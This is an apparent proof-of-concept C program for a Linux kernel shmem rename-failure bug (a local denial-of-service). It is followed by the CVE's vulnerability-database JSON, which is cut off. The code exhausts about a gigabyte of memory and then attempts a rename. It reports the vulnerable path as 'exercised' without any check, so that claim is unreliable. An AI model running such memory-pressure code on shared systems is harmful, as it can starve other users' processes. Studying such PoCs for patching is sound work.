CVE-2025-71072

// CVE-2025-71072 PoC - Local DoS via memory pressure + rename operations // This PoC demonstrates triggering the shmem rename failure condition // Compile: gcc -o cve202571072_poc cve202571072_poc.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/stat.h> #include <errno.h> #define SHMEM_PATH "/dev/shm/" #define TARGET_FILE "cve_2025_71072_target" #define WHITEBOX_FILE "cve_2025_71072_whiteout" void consume_memory() { // Consume memory to create pressure conditions void *addrs[100]; for (int i = 0; i < 100; i++) { addrs[i] = mmap(NULL, 10 * 1024 * 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (addrs[i] != MAP_FAILED) { memset(addrs[i], 0xFF, 10 * 1024 * 1024); } } } int main() { char target_path[256], whiteout_path[256]; char new_path[256]; snprintf(target_path, sizeof(target_path), "%s%s", SHMEM_PATH, TARGET_FILE); snprintf(whiteout_path, sizeof(whiteout_path), "%s%s", SHMEM_PATH, WHITEBOX_FILE); snprintf(new_path, sizeof(new_path), "%srenamed_target", SHMEM_PATH); // Create target file in shmem int fd = open(target_path, O_CREAT | O_RDWR, 0644); if (fd < 0) { perror("Failed to create target file"); return 1; } write(fd, "test data", 9); close(fd); // Create whiteout file fd = open(whiteout_path, O_CREAT | O_RDWR, 0644); if (fd >= 0) close(fd); printf("Files created. Consuming memory to create pressure...\n"); consume_memory(); printf("Attempting rename operation under memory pressure...\n"); // Trigger rename that may fail under memory pressure // This can trigger the recovery issue in shmem_rename2 if (rename(target_path, new_path) < 0) { printf("Rename failed: %s\n", strerror(errno)); printf("Underlying shmem recovery issue may have been triggered\n"); } else { printf("Rename succeeded but recovery path was exercised\n"); } // Cleanup unlink(new_path); unlink(whiteout_path); return 0; }

{"cve": {"id": "CVE-2025-71072", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:06.633", "lastModified": "2026-03-25T19:11:11.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nshmem: fix recovery on rename failures\n\nmaple_tree insertions can fail if we are seriously short on memory;\nsimple_offset_rename() does not recover well if it runs into that.\nThe same goes for simple_offset_rename_exchange().\n\nMoreover, shmem_whiteout() expects that if it succeeds, the caller will\nprogress to d_move(), i.e. that shmem_rename2() won't fail past the\nsuccessful call of shmem_whiteout().\n\nNot hard to fix, fortunately - mtree_store() can't fail if the index we\nare trying to store into is already present in the tree as a singleton.\n\nFor simple_offset_rename_exchange() that's enough - we just need to be\ncareful about the order of operations.\n\nFor simple_offset_rename() solution is to preinsert the target into the\ntree for new_dir; the rest can be done without any potentially failing\noperations.\n\nThat preinsertion has to be done in shmem_rename2() rather than in\nsimple_offset_rename() itself - otherwise we'd need to deal with the\npossibility of failure after successful shmem_whiteout()."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nshmem: corrige la recuperación en fallos de renombrado\n\nLas inserciones de maple_tree pueden fallar si tenemos una escasez grave de memoria; simple_offset_rename() no se recupera bien si se encuentra con eso. Lo mismo ocurre con simple_offset_rename_exchange().\n\nAdemás, shmem_whiteout() espera que, si tiene éxito, el llamador avance a d_move(), es decir, que shmem_rename2() no falle después de la llamada exitosa de shmem_whiteout().\n\nNo es difícil de arreglar, afortunadamente: mtree_store() no puede fallar si el índice en el que estamos intentando almacenar ya está presente en el árbol como un singleton.\n\nPara simple_offset_rename_exchange() eso es suficiente; solo necesitamos tener cuidado con el orden de las operaciones.\n\nPara simple_offset_rename() la solución es preinsertar el objetivo en el árbol para new_dir; el resto se puede hacer sin ninguna operación que pueda fallar.\n\nEsa preinserción tiene que hacerse en shmem_rename2() en lugar de en simple_offset_rename() mismo; de lo contrario, necesitaríamos lidiar con la posibilidad de fallo después de un shmem_whiteout() exitoso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.1", "versionEndExcluding": "6.12.64", "matchCriteriaId": "44DC6A0C-1CDA-49FB-A889-9025B3D5827A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:*", "matchCriteriaId": "E346B162-D566-4E62-ABDE-ECBFB21B8BFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "r ... (truncated)